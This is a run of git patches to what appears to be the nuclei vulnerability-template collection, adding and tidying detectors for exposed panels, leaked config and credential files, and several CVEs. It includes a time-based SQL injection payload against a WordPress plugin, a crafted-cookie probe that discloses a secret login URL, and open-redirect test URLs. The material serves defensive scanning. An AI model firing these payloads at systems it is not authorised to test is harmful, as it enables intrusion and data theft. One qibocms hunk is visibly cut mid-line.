verizon-router-panel.yaml --- exposed-panels/verizon-router-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/verizon-router-panel.yaml b/exposed-panels/verizon-router-panel.yaml index f93ce64df7..407e71e008 100644 --- a/exposed-panels/verizon-router-panel.yaml +++ b/exposed-panels/verizon-router-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"Verizon Router" - tags: verizon-router, login + tags: panel,verizon,router requests: - method: GET @@ -20,7 +20,6 @@ requests: part: body words: - 'Verizon Router' - condition: and - type: status status: From 32d22ecf1f0ebc3567cc359c93bc406163313f7d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:16:28 +0530 Subject: [PATCH 0393/1133] Update microfocus-admin-server.yaml --- exposed-panels/microfocus-admin-server.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/exposed-panels/microfocus-admin-server.yaml b/exposed-panels/microfocus-admin-server.yaml index 56d11f7d31..41533f358d 100644 --- a/exposed-panels/microfocus-admin-server.yaml +++ b/exposed-panels/microfocus-admin-server.yaml @@ -4,7 +4,10 @@ info: name: Micro Focus Enterprise Server Administration author: theabhinavgaur severity: medium - tags: Micro Focus DSD + metadata: + verified: true + shodan-query: "Micro Focus DSD" + tags: panel,exposure,microfocus,admin requests: - method: GET @@ -16,7 +19,7 @@ requests: - type: word part: header words: - - Micro Focus DSD + - "Micro Focus DSD" - type: status status: From 65e191663ddaab7f901ce6240f19f2ab584e04a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:25:43 +0530 Subject: [PATCH 0394/1133] Update CVE-2022-2314.yaml --- cves/2022/CVE-2022-2314.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml index f96dd66a19..2b4dc01c58 100644 --- a/cves/2022/CVE-2022-2314.yaml +++ b/cves/2022/CVE-2022-2314.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/vr-calendar-sync/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-2314 - cwe-id: CWE-78 metadata: - verified: "true" - tags: cve,cve2021,rce,wpscan,wordpress,wp-plugin,vr-calendar-sync,unauth + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth requests: - raw: From 882debedec8c47bfc5790f0e91c1abd58e9c5fa8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 22:38:12 +0530 Subject: [PATCH 0395/1133] Update CVE-2022-2314.yaml --- cves/2022/CVE-2022-2314.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml index 2b4dc01c58..fac0172cbb 100644 --- a/cves/2022/CVE-2022-2314.yaml +++ b/cves/2022/CVE-2022-2314.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2022-2314 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth requests: - raw: From e5398d06d1b5389cb65061c116178d475e4c5791 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:40:15 +0530 Subject: [PATCH 0396/1133] Update qibocms-file-download.yaml --- vulnerabilities/qibocms-file-download.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index b351c71785..0de63372c4 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -1,10 +1,10 @@ id: qibocms-file-download info: - name: qibocms file download- arbitary file download + name: Qibocms - Arbitary File Download author: theabhinavgaur severity: high - tags: qibocms-file-download + tags: qibocms,arbitary,download requests: - method: GET @@ -20,6 +20,11 @@ requests: - "$webdb" condition: and + - type: word + part: header + words: + - "filename=config" + - type: status status: - 200 From 27a5c1b9c1af39cb0b7f0bf64634aab09084d484 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:42:18 +0530 Subject: [PATCH 0397/1133] Update qibocms-file-download.yaml --- vulnerabilities/qibocms-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index 0de63372c4..fb1784fb82 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -17,7 +17,7 @@ requests: part: body words: - " Date: Mon, 12 Dec 2022 22:48:05 +0530 Subject: [PATCH 0399/1133] Update qibocms-file-download.yaml --- vulnerabilities/qibocms-file-download.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index fb1784fb82..f80730e288 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -4,6 +4,8 @@ info: name: Qibocms - Arbitary File Download author: theabhinavgaur severity: high + metadata: + verified: true tags: qibocms,arbitary,download requests: From 9665bcd5f8e3f1b76cafb5e1da51be324ef512cb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:55:49 +0530 Subject: [PATCH 0400/1133] Update CVE-2022-45917.yaml --- cves/2022/CVE-2022-45917.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index f974a5c486..0904a35b46 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -9,18 +9,19 @@ info: reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html metadata: - shodan-query: http.html:"ILIAS" verified: true - tags: cve,2022,open,redirect + shodan-query: http.html:"ILIAS" + tags: cve,cve2022,ilias,redirect requests: - method: GET path: - - "{{BaseURL}}/shib_logout.php?action=logout&return=https://attacker.com" - - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://attacker.com" + - "{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com" + - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com" + stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' From bf41cfb450e9d0965eee3d95e815844866c02ff0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 23:03:07 +0530 Subject: [PATCH 0401/1133] Update CVE-2022-45917.yaml --- cves/2022/CVE-2022-45917.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index 0904a35b46..91179758e9 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -8,6 +8,9 @@ info: ILIAS before 7.16 has an Open Redirect reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html + - https://seclists.org/fulldisclosure/2022/Dec/7 + - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/ + - https://github.com/advisories/GHSA-hf6q-rx44-fh6j metadata: verified: true shodan-query: http.html:"ILIAS" From 37bc060282521ebe4674ed797796ef9b02135bed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:06:14 +0530 Subject: [PATCH 0402/1133] Update ilias-panel.yaml --- exposed-panels/ilias-panel.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index 561cd1c82d..cb207e09f0 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -1,12 +1,12 @@ id: ilias-panel info: - name: ILIAS - Panel + name: ILIAS Panel author: arafatansari severity: info metadata: - shodan-query: http.html:"ILIAS" verified: true + shodan-query: http.html:"ILIAS" tags: panel,ilias requests: @@ -15,15 +15,14 @@ requests: - "{{BaseURL}}/login.php" - "{{BaseURL}}/ilias/login.php" + stop-at-first-match: true matchers: - - type: status - status: - - 200 - - type: word words: - 'Login to ILIAS' - - 'User Name' - - 'Password' - - 'formlogin' - condition: and + - 'alt="ILIAS' + - 'powered by ILIAS' + + - type: status + status: + - 200 From 150fef56273cf8dcd736b91ba50cd4fabd0b3f5d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:11:10 +0530 Subject: [PATCH 0403/1133] Update planet-estream-panel.yaml --- exposed-panels/planet-estream-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/planet-estream-panel.yaml b/exposed-panels/planet-estream-panel.yaml index 552e662cbb..a26b66b36c 100644 --- a/exposed-panels/planet-estream-panel.yaml +++ b/exposed-panels/planet-estream-panel.yaml @@ -12,15 +12,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}/Login.aspx" host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word words: - 'Login - Planet eStream' - - 'Enter Credentials..' + - 'Powered by Planet eStream' + - 'aria-label="Planet eStream Website' condition: or - type: status From 2dd077d3936663f180c8c1fd74fe7484f7bba032 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 23:17:12 +0530 Subject: [PATCH 0404/1133] Update planet-estream-panel.yaml --- exposed-panels/planet-estream-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/planet-estream-panel.yaml b/exposed-panels/planet-estream-panel.yaml index a26b66b36c..77bd110968 100644 --- a/exposed-panels/planet-estream-panel.yaml +++ b/exposed-panels/planet-estream-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Login - Planet eStream" - tags: panel,planet,eStream + tags: panel,planet,estream requests: - method: GET From ebe422ca3acaa71fdbdac6831ab6f3bdc15b2d0c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:17:18 +0530 Subject: [PATCH 0405/1133] Update database-credentials.yaml --- exposures/files/database-credentials.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/database-credentials.yaml b/exposures/files/database-credentials.yaml index 0f9997d204..edf5ec1915 100644 --- a/exposures/files/database-credentials.yaml +++ b/exposures/files/database-credentials.yaml @@ -3,12 +3,12 @@ id: database-credentials info: name: Database Credentials File Exposure author: Hardik-Solanki - severity: high + severity: low + reference: + - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: verified: true github-query: filename:database_credentials.inc - reference: - - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt tags: exposure,database,config,files requests: From 6b2db3e077e86b837362e6389bc7b29dee8b679c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:19:20 +0530 Subject: [PATCH 0406/1133] Update golangci-config.yaml --- exposures/configs/golangci-config.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/configs/golangci-config.yaml b/exposures/configs/golangci-config.yaml index 34c753c49d..40b53b3e99 100644 --- a/exposures/configs/golangci-config.yaml +++ b/exposures/configs/golangci-config.yaml @@ -4,12 +4,12 @@ info: name: GolangCI-Lint Configuration File Exposure author: Hardik-Solanki severity: low - metadata: - verified: true - github-query: filename:golangci.yml reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://golangci-lint.run/usage/configuration/ + metadata: + verified: true + github-query: filename:golangci.yml tags: exposure,golang,devops,cicd requests: From 84ad5b64c3e3c84f29a2f8ded122bff026bcc6b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:21:38 +0530 Subject: [PATCH 0407/1133] Update kubernetes-etcd-keys.yaml --- exposures/files/kubernetes-etcd-keys.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/kubernetes-etcd-keys.yaml b/exposures/files/kubernetes-etcd-keys.yaml index f17d0f8785..10ffe53158 100644 --- a/exposures/files/kubernetes-etcd-keys.yaml +++ b/exposures/files/kubernetes-etcd-keys.yaml @@ -3,12 +3,12 @@ id: kubernetes-etcd-keys info: name: Kubernetes etcd Keys Exposure author: Hardik-Solanki - severity: high + severity: medium + reference: + - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: verified: true github-query: filename:apiserver-etcd-client.key - reference: - - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt tags: files,exposure,kubernetes,k8s requests: From a5920e7df5c45297432ee071cddfdc060b98962f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:23:21 +0530 Subject: [PATCH 0408/1133] Update firebase-debug-log.yaml --- exposures/logs/firebase-debug-log.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/logs/firebase-debug-log.yaml b/exposures/logs/firebase-debug-log.yaml index ca4fdd9ad7..f68c3cb876 100644 --- a/exposures/logs/firebase-debug-log.yaml +++ b/exposures/logs/firebase-debug-log.yaml @@ -4,11 +4,11 @@ info: name: Firebase Debug Log File Exposure author: Hardik-Solanki severity: low + reference: + - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: verified: true github-query: filename:firebase-debug.log - reference: - - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt tags: exposure,firebase,log,debug requests: From cdaeb08c8cec1efbadbcf4992f3e7ed96fac90a3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:25:36 +0530 Subject: [PATCH 0409/1133] Update npm-debug-log.yaml --- exposures/logs/npm-debug-log.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/logs/npm-debug-log.yaml b/exposures/logs/npm-debug-log.yaml index 471a88c46e..24856ffbd5 100644 --- a/exposures/logs/npm-debug-log.yaml +++ b/exposures/logs/npm-debug-log.yaml @@ -4,12 +4,12 @@ info: name: NPM Debug Log Disclosure author: Hardik-Solanki severity: low - metadata: - verified: true - github-query: filename:npm-debug.log reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://docs.npmjs.com/generating-and-locating-npm-debug.log-files + metadata: + verified: true + github-query: filename:npm-debug.log tags: exposure,npm,log,debug requests: From 6ad5d3c262fbb02297a5665bee7b371407094f61 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:47:01 +0530 Subject: [PATCH 0410/1133] Update CVE-2021-25099.yaml --- cves/2021/CVE-2021-25099.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-25099.yaml b/cves/2021/CVE-2021-25099.yaml index 0ca41bb764..8759827774 100644 --- a/cves/2021/CVE-2021-25099.yaml +++ b/cves/2021/CVE-2021-25099.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25099 info: - name: Give < 2.17.3 - Unauthenticated Reflected Cross-Site Scripting + name: Give < 2.17.3 - Cross-Site Scripting author: theamanrawat severity: medium description: | @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2021-25099 - cwe-id: CWE-79 metadata: - verified: "true" - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,give,unauth + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth requests: - raw: @@ -34,4 +31,5 @@ requests: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "")' + - 'contains(body, "give_user_login")' condition: and From d0a5b15c38c9c25b1eae48cb9f5233cefb206f8f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:49:02 +0530 Subject: [PATCH 0411/1133] Update svn-wc-db.yaml --- exposures/files/svn-wc-db.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index 63268dbaf9..eda792a694 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -4,13 +4,13 @@ info: name: SVN wc.db File Exposure author: Hardik-Solanki severity: medium - metadata: - verified: true - google-query: intitle:"index of" "wc.db" reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb - tags: exposure,svn,config + metadata: + verified: true + google-query: intitle:"index of" "wc.db" + tags: exposure,svn,config,files requests: - method: GET From 69cb435a1a0ff07063e60167ef5fbd0cc5b12aa1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 23:50:27 +0530 Subject: [PATCH 0412/1133] Update ilias-panel.yaml --- exposed-panels/ilias-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index cb207e09f0..b199ed62ba 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -22,6 +22,7 @@ requests: - 'Login to ILIAS' - 'alt="ILIAS' - 'powered by ILIAS' + condition: or - type: status status: From 20ede90226f0728bf7ef5cc94865f04ec220e2a6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:51:19 +0530 Subject: [PATCH 0413/1133] Update stestr-config.yaml --- exposures/configs/stestr-config.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposures/configs/stestr-config.yaml b/exposures/configs/stestr-config.yaml index 1c96a0dc17..b6ae305ca1 100644 --- a/exposures/configs/stestr-config.yaml +++ b/exposures/configs/stestr-config.yaml @@ -4,13 +4,13 @@ info: name: Stestr Configuration File Exposure author: Hardik-Solanki severity: info - metadata: - verified: true - github-query: filename:stestr.conf reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://stestr.readthedocs.io/en/latest/MANUAL.html - tags: exposure,stestr,config + metadata: + verified: true + github-query: filename:stestr.conf + tags: exposure,stestr,config,files requests: - method: GET From 0f876a83a601fa85bcec20a841c2413c779f9458 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:54:42 +0530 Subject: [PATCH 0414/1133] Update badarg-log.yaml --- exposures/logs/badarg-log.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposures/logs/badarg-log.yaml b/exposures/logs/badarg-log.yaml index ce30216ceb..a05ff4e14c 100644 --- a/exposures/logs/badarg-log.yaml +++ b/exposures/logs/badarg-log.yaml @@ -4,13 +4,13 @@ info: name: Badarg Log File Exposure author: Hardik-Solanki severity: low - metadata: - verified: true - github-query: filename:badarg.log reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://www.erlang.org/doc/reference_manual/errors.html - tags: exposure,erlang,log,debug + metadata: + verified: true + github-query: filename:badarg.log + tags: exposure,badarg,log,debug requests: - method: GET @@ -24,6 +24,7 @@ requests: words: - 'Special kernel symbols:' - 'Kernel executable memory footprint:' + - 'badarg' condition: and - type: status From 5631300f52c40a9de03ca1595b1fc13d644ec980 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 13 Dec 2022 00:04:11 +0530 Subject: [PATCH 0415/1133] Update and rename master-admin.yaml to gyra-master-admin.yaml --- exposed-panels/gyra-master-admin.yaml | 25 +++++++++++++++++++++ exposed-panels/master-admin.yaml | 32 --------------------------- 2 files changed, 25 insertions(+), 32 deletions(-) create mode 100644 exposed-panels/gyra-master-admin.yaml delete mode 100644 exposed-panels/master-admin.yaml diff --git a/exposed-panels/gyra-master-admin.yaml b/exposed-panels/gyra-master-admin.yaml new file mode 100644 index 0000000000..5da78947bf --- /dev/null +++ b/exposed-panels/gyra-master-admin.yaml @@ -0,0 +1,25 @@ +id: gyra-master-admin + +info: + name: GYRA Master Admin + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"Login | GYRA Master Admin" + tags: panel,master,admin + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Login | GYRA Master Admin" + + - type: status + status: + - 200 diff --git a/exposed-panels/master-admin.yaml b/exposed-panels/master-admin.yaml deleted file mode 100644 index 2bf6c5a9bb..0000000000 --- a/exposed-panels/master-admin.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: master-admin - -info: - name: Master Admin - author: Hardik-Solanki - severity: info - metadata: - verified: true - shodan-query: title:"Master Admin" - tags: panel,master,admin - -requests: - - method: GET - path: - - '{{BaseURL}}/#/auth/login' - - '{{BaseURL}}/#/login?redirect=%2F' - - '{{BaseURL}}/wp-signup.php' - - '{{BaseURL}}/login' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Master Admin" - - "login" - - "Master-Admin" - condition: or - - - type: status - status: - - 200 From d1a2210f9ff38b56f7cd6ca18fcb7f97b448cdb5 Mon Sep 17 00:00:00 2001 From: Matt Keeler <19890779+mattkeeler@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:35:36 -0500 Subject: [PATCH 0417/1133] Add additional backup extension --- exposures/backups/zip-backup-files.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 84220006c8..d5e647afda 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -23,6 +23,7 @@ requests: - "lz" - "rar" - "tar.gz" + - "tar.bz2" - "xz" - "zip" - "z" From 115b5e280d9d9a3cc7998830c4bc4b4aad42b4b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 13 Dec 2022 13:48:23 +0530 Subject: [PATCH 0418/1133] filename update --- exposures/configs/{phpinfo.yaml => phpinfo-files.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/configs/{phpinfo.yaml => phpinfo-files.yaml} (100%) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo-files.yaml similarity index 100% rename from exposures/configs/phpinfo.yaml rename to exposures/configs/phpinfo-files.yaml From 2dcd340a509f196318fa761809d555b8eb797a27 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 13 Dec 2022 17:09:39 +0530 Subject: [PATCH 0419/1133] Added template for CVE-2022-1595 --- cves/2022/CVE-2022-1595.yaml | 38 ++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2022/CVE-2022-1595.yaml diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml new file mode 100644 index 0000000000..896412bb68 --- /dev/null +++ b/cves/2022/CVE-2022-1595.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-1595 + +info: + name: HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure + author: theamanrawat + severity: medium + description: | + The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request. + reference: + - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b + - https://wordpress.org/plugins/hc-custom-wp-admin-url/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.1 + cve-id: CVE-2022-1595 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2022,wpscan,info-disclosure,wordpress,wp-plugin,hc-custom-wp-admin-url,unauth + +requests: + - raw: + - | + HEAD /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Cookie: valid_login_slug=1 + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Location: ([a-zA-Z0-9_.\\/-]+)" + + - type: status + status: + - 302 \ No newline at end of file From f6c9291b83d7adb772a3fe8528ba60b3df89a21d Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 13 Dec 2022 19:52:56 +0530 Subject: [PATCH 0420/1133] Added template for CVE-2022-4050 --- cves/2022/CVE-2022-4050.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-4050.yaml diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml new file mode 100644 index 0000000000..a0ed1b9e47 --- /dev/null +++ b/cves/2022/CVE-2022-4050.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-4050 + +info: + name: JoomSport < 5.2.8 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f + - https://wordpress.org/plugins/joomsport-sports-league-results-management/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4050 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + +requests: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "jscaruselcont jsview2")' + condition: and \ No newline at end of file From 03c2ef23918126b24acb6ff78a6d8b9482e2af07 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 13 Dec 2022 15:36:48 -0500 Subject: [PATCH 0421/1133] Dashboard Content Enhancements (#6358) Dashboard Content Enhancements --- cves/2017/CVE-2017-14186.yaml | 46 +++++++++---------- cves/2017/CVE-2017-8917.yaml | 2 +- cves/2022/CVE-2022-1916.yaml | 6 ++- cves/2022/CVE-2022-1933.yaml | 6 ++- cves/2022/CVE-2022-22242.yaml | 6 ++- cves/2022/CVE-2022-26263.yaml | 9 +++- cves/2022/CVE-2022-28290.yaml | 8 ++-- cves/2022/CVE-2022-33965.yaml | 8 ++-- cves/2022/CVE-2022-3484.yaml | 6 ++- cves/2022/CVE-2022-3506.yaml | 7 ++- cves/2022/CVE-2022-3578.yaml | 6 ++- cves/2022/CVE-2022-40359.yaml | 8 ++-- cves/2022/CVE-2022-40879.yaml | 4 +- cves/2022/CVE-2022-42746.yaml | 11 +++-- cves/2022/CVE-2022-42747.yaml | 8 ++-- cves/2022/CVE-2022-42748.yaml | 8 ++-- cves/2022/CVE-2022-42749.yaml | 8 ++-- cves/2022/CVE-2022-43014.yaml | 6 ++- cves/2022/CVE-2022-43015.yaml | 6 ++- cves/2022/CVE-2022-43016.yaml | 6 ++- cves/2022/CVE-2022-43017.yaml | 6 ++- cves/2022/CVE-2022-43018.yaml | 6 ++- miscellaneous/x-recruiting-header.yaml | 2 +- misconfiguration/mysqld-exporter-metrics.yaml | 9 +++- vulnerabilities/other/aerocms-sqli.yaml | 10 +++- vulnerabilities/other/steve-xss.yaml | 8 +++- vulnerabilities/other/wuzhicms-sqli.yaml | 2 + vulnerabilities/wordpress/wptouch-xss.yaml | 10 +++- 28 files changed, 151 insertions(+), 77 deletions(-) diff --git 